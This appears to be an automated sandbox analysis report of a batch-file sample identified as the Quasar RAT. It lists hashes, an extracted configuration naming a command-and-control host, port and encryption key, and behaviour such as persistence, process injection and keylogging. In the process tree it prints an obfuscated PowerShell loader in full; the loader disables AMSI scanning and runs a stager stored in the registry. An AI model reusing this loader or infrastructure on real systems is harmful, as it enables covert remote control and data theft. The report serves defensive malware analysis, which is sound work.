Analysis
-
max time kernel
12s -
max time network
25s -
platform
windows11-21h2_x64 -
resource
win11-20240426-en -
resource tags
arch:x64arch:x86image:win11-20240426-enlocale:en-usos:windows11-21h2-x64system -
submitted
08-05-2024 17:18
Static task
static1
General
-
Target
Uni.bat
-
Size
670KB
-
MD5
6a80458e28d1386f08bbd333e223ec19
-
SHA1
77ab8b6fa59cc618bf4a5e7f52ffcd8f5c9656a8
-
SHA256
8711245a4e790f4e757f4657e0edd3ff36cd767293e60b56d8e8501bca9c8a3d
-
SHA512
e6db2882538d6b563aaeb8df1831ea8c90dd37242fe686e9ab0b80f9c397bdfdf3596b28b036ac9308c456257e7a3cc607657c4e98853647e85d23f8b1588d81
-
SSDEEP
12288:3X+4dH3qy2pEKjy2YkbOtscQeH8XDYTDL832UtYnUg3:H+4dH3enjy2ZbOzTceUq
Malware Config
Extracted
quasar
3.1.5
SLAVE
even-lemon.gl.at.ply.gg:33587
$Sxr-dOMA5C0pQTTpKjVsCp
-
encryption_key
UBXs44u6E81wxBGZxQHk
-
install_name
$sxr-powershell.exe
-
log_directory
$SXR-KEYLOGS
-
reconnect_delay
3000
-
startup_key
$sxr-powershell
-
subdirectory
$sxr-seroxen2
Signatures
-
Quasar payload 2 IoCs
Processes:
resource yara_rule C:\Users\Admin\AppData\Local\Temp\x.exe family_quasar behavioral1/memory/4824-7986-0x00000000000D0000-0x000000000013C000-memory.dmp family_quasar -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3592 created 640 3592 powershell.EXE winlogon.exe PID 2300 created 640 2300 powershell.EXE winlogon.exe -
Executes dropped EXE 4 IoCs
Processes:
x.exe$sxr-powershell.exeinstall.exeinstall.exepid process 4824 x.exe 1700 $sxr-powershell.exe 708 install.exe 5024 install.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs 3 IoCs
Processes:
flow ioc 1 raw.githubusercontent.com 4 raw.githubusercontent.com 8 raw.githubusercontent.com -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
Processes:
flow ioc 1 ip-api.com -
Drops file in System32 directory 4 IoCs
Processes:
powershell.EXEsvchost.exedescription ioc process File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.EXE File opened for modification C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log powershell.EXE File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4KernelMode.evtx svchost.exe File opened for modification C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx svchost.exe -
Suspicious use of SetThreadContext 2 IoCs
Processes:
powershell.EXEpowershell.EXEdescription pid process target process PID 3592 set thread context of 2208 3592 powershell.EXE dllhost.exe PID 2300 set thread context of 4084 2300 powershell.EXE dllhost.exe -
Creates scheduled task(s) 1 TTPs 3 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
schtasks.exeSCHTASKS.exeschtasks.exepid process 5100 schtasks.exe 1292 SCHTASKS.exe 4828 schtasks.exe -
Modifies data under HKEY_USERS 64 IoCs
Processes:
powershell.EXEpowershell.EXEdescription ioc process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.EXE Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.EXE -
Suspicious behavior: EnumeratesProcesses 25 IoCs
Processes:
powershell.EXEpowershell.EXEdllhost.exe$sxr-powershell.exedllhost.exepid process 3592 powershell.EXE 3592 powershell.EXE 2300 powershell.EXE 2300 powershell.EXE 3592 powershell.EXE 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 1700 $sxr-powershell.exe 2208 dllhost.exe 2208 dllhost.exe 2300 powershell.EXE 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 2208 dllhost.exe 1700 $sxr-powershell.exe 2300 powershell.EXE 4084 dllhost.exe 4084 dllhost.exe 4084 dllhost.exe 4084 dllhost.exe -
Suspicious use of AdjustPrivilegeToken 8 IoCs
Processes:
x.exe$sxr-powershell.exepowershell.EXEpowershell.EXEdllhost.exedllhost.exedescription pid process Token: SeDebugPrivilege 4824 x.exe Token: SeDebugPrivilege 1700 $sxr-powershell.exe Token: SeDebugPrivilege 3592 powershell.EXE Token: SeDebugPrivilege 2300 powershell.EXE Token: SeDebugPrivilege 3592 powershell.EXE Token: SeDebugPrivilege 2208 dllhost.exe Token: SeDebugPrivilege 2300 powershell.EXE Token: SeDebugPrivilege 4084 dllhost.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
$sxr-powershell.exepid process 1700 $sxr-powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
cmd.exex.exe$sxr-powershell.exepowershell.EXEdllhost.exedescription pid process target process PID 4876 wrote to memory of 2384 4876 cmd.exe findstr.exe PID 4876 wrote to memory of 2384 4876 cmd.exe findstr.exe PID 4876 wrote to memory of 1748 4876 cmd.exe cscript.exe PID 4876 wrote to memory of 1748 4876 cmd.exe cscript.exe PID 4876 wrote to memory of 4824 4876 cmd.exe x.exe PID 4876 wrote to memory of 4824 4876 cmd.exe x.exe PID 4876 wrote to memory of 4824 4876 cmd.exe x.exe PID 4824 wrote to memory of 5100 4824 x.exe schtasks.exe PID 4824 wrote to memory of 5100 4824 x.exe schtasks.exe PID 4824 wrote to memory of 5100 4824 x.exe schtasks.exe PID 4824 wrote to memory of 1700 4824 x.exe $sxr-powershell.exe PID 4824 wrote to memory of 1700 4824 x.exe $sxr-powershell.exe PID 4824 wrote to memory of 1700 4824 x.exe $sxr-powershell.exe PID 4824 wrote to memory of 708 4824 x.exe install.exe PID 4824 wrote to memory of 708 4824 x.exe install.exe PID 4824 wrote to memory of 708 4824 x.exe install.exe PID 4824 wrote to memory of 1292 4824 x.exe SCHTASKS.exe PID 4824 wrote to memory of 1292 4824 x.exe SCHTASKS.exe PID 4824 wrote to memory of 1292 4824 x.exe SCHTASKS.exe PID 1700 wrote to memory of 4828 1700 $sxr-powershell.exe schtasks.exe PID 1700 wrote to memory of 4828 1700 $sxr-powershell.exe schtasks.exe PID 1700 wrote to memory of 4828 1700 $sxr-powershell.exe schtasks.exe PID 1700 wrote to memory of 5024 1700 $sxr-powershell.exe install.exe PID 1700 wrote to memory of 5024 1700 $sxr-powershell.exe install.exe PID 1700 wrote to memory of 5024 1700 $sxr-powershell.exe install.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 3592 wrote to memory of 2208 3592 powershell.EXE dllhost.exe PID 2208 wrote to memory of 640 2208 dllhost.exe winlogon.exe PID 2208 wrote to memory of 696 2208 dllhost.exe lsass.exe PID 2208 wrote to memory of 988 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 436 2208 dllhost.exe dwm.exe PID 2208 wrote to memory of 748 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 444 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1100 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1108 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1188 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1220 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1268 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1304 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1364 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1436 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1536 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1624 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1636 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1688 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1736 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1768 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1840 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1928 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1980 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1988 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 1448 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 2064 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 2172 2208 dllhost.exe spoolsv.exe PID 2208 wrote to memory of 2280 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 2364 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 2460 2208 dllhost.exe svchost.exe PID 2208 wrote to memory of 2468 2208 dllhost.exe svchost.exe
Processes
-
C:\Windows\system32\winlogon.exewinlogon.exe1⤵
-
C:\Windows\system32\dwm.exe"dwm.exe"2⤵
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{e51d8a0b-0191-4996-b00e-710d5ee9cb42}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\dllhost.exeC:\Windows\System32\dllhost.exe /Processid:{3c6b0225-e10e-4150-bedf-f4de8c3ab51c}2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts1⤵
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalService -p -s nsi1⤵
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule1⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JRYpftEhgbOI{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$WeWZqcFlElZiQa,[Parameter(Position=1)][Type]$yfsEIKzzxo)$UHeubxFrXnt=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+''+[Char](101)+''+[Char](102)+''+[Char](108)+''+'e'+''+[Char](99)+''+[Char](116)+''+'e'+''+'d'+''+[Char](68)+''+'e'+'l'+'e'+''+'g'+''+'a'+''+[Char](116)+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+'m'+'o'+''+[Char](114)+''+'y'+''+'M'+'o'+[Char](100)+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType('M'+[Char](121)+''+'D'+'e'+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+''+'p'+''+'e'+'','C'+[Char](108)+'a'+[Char](115)+''+[Char](115)+''+','+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+''+','+''+[Char](83)+''+[Char](101)+''+[Char](97)+''+'l'+''+[Char](101)+''+[Char](100)+''+[Char](44)+''+[Char](65)+''+[Char](110)+'s'+'i'+''+[Char](67)+''+[Char](108)+''+[Char](97)+''+'s'+''+[Char](115)+''+','+''+[Char](65)+'ut'+'o'+'C'+[Char](108)+''+'a'+''+'s'+'s',[MulticastDelegate]);$UHeubxFrXnt.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+[Char](101)+''+[Char](99)+''+[Char](105)+'al'+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+','+''+[Char](72)+''+[Char](105)+''+'d'+''+[Char](101)+''+[Char](66)+''+[Char](121)+''+'S'+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+'b'+''+'l'+''+[Char](105)+''+'c'+'',[Reflection.CallingConventions]::Standard,$WeWZqcFlElZiQa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+'e'+','+''+[Char](77)+''+[Char](97)+''+[Char](110)+''+[Char](97)+''+[Char](103)+'e'+[Char](100)+'');$UHeubxFrXnt.DefineMethod(''+'I'+''+'n'+''+'v'+''+[Char](111)+''+'k'+''+[Char](101)+'','P'+'u'+'bl'+[Char](105)+'c'+','+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+[Char](101)+'B'+'y'+''+[Char](83)+''+[Char](105)+'g'+','+''+'N'+'e'+[Char](119)+''+[Char](83)+''+[Char](108)+''+[Char](111)+'t'+[Char](44)+'Vir'+'t'+''+'u'+''+[Char](97)+''+[Char](108)+'',$yfsEIKzzxo,$WeWZqcFlElZiQa).SetImplementationFlags(''+[Char](82)+''+[Char](117)+'n'+'t'+''+[Char](105)+''+[Char](109)+''+'e'+','+[Char](77)+''+[Char](97)+''+'n'+''+[Char](97)+''+[Char](103)+''+[Char](101)+'d');Write-Output $UHeubxFrXnt.CreateType();}$FJUpAUHWGostJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+''+[Char](115)+''+[Char](116)+'e'+[Char](109)+''+[Char](46)+'d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+[Char](99)+''+'r'+''+'o'+''+[Char](115)+''+'o'+''+[Char](102)+'t'+[Char](46)+'W'+[Char](105)+'n'+[Char](51)+''+[Char](50)+''+[Char](46)+''+[Char](85)+''+[Char](110)+''+[Char](115)+'a'+'f'+''+[Char](101)+'NativeM'+[Char](101)+'t'+[Char](104)+'o'+[Char](100)+''+'s'+'');$FEbJGdahghMgnu=$FJUpAUHWGostJ.GetMethod(''+[Char](71)+''+[Char](101)+''+[Char](116)+'P'+'r'+''+[Char](111)+'c'+[Char](65)+'d'+'d'+'ress',[Reflection.BindingFlags](''+'P'+''+[Char](117)+''+'b'+''+[Char](108)+''+[Char](105)+''+'c'+''+[Char](44)+''+[Char](83)+''+[Char](116)+''+[Char](97)+''+[Char](116)+''+[Char](105)+'c'),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$HuSfXmxWIeKOqzEXezj=JRYpftEhgbOI @([String])([IntPtr]);$doVFJlqcLAFMnmicbCGyYi=JRYpftEhgbOI @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$PBKYLZcuPQD=$FJUpAUHWGostJ.GetMethod(''+[Char](71)+''+'e'+'tM'+'o'+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+''+[Char](72)+''+'a'+''+[Char](110)+''+'d'+''+[Char](108)+'e').Invoke($Null,@([Object]('ke'+[Char](114)+''+[Char](110)+''+[Char](101)+'l'+'3'+''+'2'+''+'.'+''+'d'+'l'+[Char](108)+'')));$ZBBAGHVbGyBqqa=$FEbJGdahghMgnu.Invoke($Null,@([Object]$PBKYLZcuPQD,[Object](''+[Char](76)+'oad'+[Char](76)+'i'+'b'+''+[Char](114)+''+[Char](97)+'ry'+[Char](65)+'')));$SrACrGkJrcGiVprKl=$FEbJGdahghMgnu.Invoke($Null,@([Object]$PBKYLZcuPQD,[Object](''+'V'+''+'i'+''+[Char](114)+'t'+'u'+''+'a'+''+[Char](108)+''+[Char](80)+''+[Char](114)+'o'+[Char](116)+''+[Char](101)+'c'+[Char](116)+'')));$TvPTAFX=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($ZBBAGHVbGyBqqa,$HuSfXmxWIeKOqzEXezj).Invoke(''+'a'+'m'+[Char](115)+''+[Char](105)+'.'+[Char](100)+''+'l'+''+[Char](108)+'');$tfxyezlZgiApThuyv=$FEbJGdahghMgnu.Invoke($Null,@([Object]$TvPTAFX,[Object](''+'A'+'m'+[Char](115)+''+[Char](105)+''+[Char](83)+''+'c'+'a'+'n'+''+'B'+'u'+'f'+''+[Char](102)+''+'e'+''+[Char](114)+'')));$AhPrTJpCDw=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SrACrGkJrcGiVprKl,$doVFJlqcLAFMnmicbCGyYi).Invoke($tfxyezlZgiApThuyv,[uint32]8,4,[ref]$AhPrTJpCDw);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$tfxyezlZgiApThuyv,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($SrACrGkJrcGiVprKl,$doVFJlqcLAFMnmicbCGyYi).Invoke($tfxyezlZgiApThuyv,[uint32]8,0x20,[ref]$AhPrTJpCDw);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+'S'+''+[Char](79)+''+'F'+'T'+[Char](87)+''+[Char](65)+''+'R'+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+[Char](55)+'s'+'t'+''+[Char](97)+''+'g'+''+'e'+'r')).EntryPoint.Invoke($Null,$Null)"2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JkArrNdATHnm{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$ZpWDyVCibucvOV,[Parameter(Position=1)][Type]$bOcJIWXQEG)$aZdvvLpqsTA=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+[Char](82)+'e'+[Char](102)+''+[Char](108)+''+'e'+'ct'+[Char](101)+''+[Char](100)+'D'+'e'+''+[Char](108)+''+[Char](101)+''+[Char](103)+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+'e'+'mor'+'y'+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+'l'+''+[Char](101)+'',$False).DefineType(''+[Char](77)+''+'y'+''+'D'+'e'+[Char](108)+'e'+'g'+''+[Char](97)+''+[Char](116)+'eT'+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+'l'+''+'a'+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+[Char](80)+''+[Char](117)+''+[Char](98)+''+[Char](108)+'i'+[Char](99)+''+[Char](44)+'S'+[Char](101)+''+'a'+'l'+'e'+''+[Char](100)+''+','+''+[Char](65)+''+[Char](110)+''+'s'+''+[Char](105)+''+[Char](67)+'l'+'a'+'ss'+[Char](44)+''+[Char](65)+''+[Char](117)+''+[Char](116)+''+'o'+''+[Char](67)+'l'+[Char](97)+''+[Char](115)+'s',[MulticastDelegate]);$aZdvvLpqsTA.DefineConstructor(''+[Char](82)+'T'+[Char](83)+''+'p'+''+[Char](101)+''+[Char](99)+''+[Char](105)+''+[Char](97)+''+[Char](108)+''+[Char](78)+''+[Char](97)+'m'+[Char](101)+','+[Char](72)+''+[Char](105)+''+'d'+'e'+[Char](66)+''+[Char](121)+''+[Char](83)+''+[Char](105)+''+[Char](103)+''+[Char](44)+''+[Char](80)+'ub'+[Char](108)+'i'+[Char](99)+'',[Reflection.CallingConventions]::Standard,$ZpWDyVCibucvOV).SetImplementationFlags(''+'R'+'u'+[Char](110)+''+'t'+''+[Char](105)+'me'+[Char](44)+'M'+'a'+''+'n'+''+[Char](97)+''+'g'+''+'e'+''+[Char](100)+'');$aZdvvLpqsTA.DefineMethod(''+'I'+'n'+'v'+''+'o'+''+'k'+''+'e'+'',''+[Char](80)+''+'u'+''+[Char](98)+''+[Char](108)+'i'+'c'+''+[Char](44)+''+[Char](72)+''+[Char](105)+''+[Char](100)+''+'e'+''+[Char](66)+''+'y'+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+''+[Char](78)+''+[Char](101)+''+[Char](119)+''+[Char](83)+'l'+[Char](111)+'t'+[Char](44)+'V'+[Char](105)+''+'r'+''+[Char](116)+''+'u'+'a'+'l'+'',$bOcJIWXQEG,$ZpWDyVCibucvOV).SetImplementationFlags('R'+[Char](117)+''+[Char](110)+''+[Char](116)+''+'i'+''+[Char](109)+''+'e'+''+[Char](44)+''+[Char](77)+'a'+'n'+''+[Char](97)+''+'g'+''+[Char](101)+''+[Char](100)+'');Write-Output $aZdvvLpqsTA.CreateType();}$JvxrNJAJRZnQM=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And 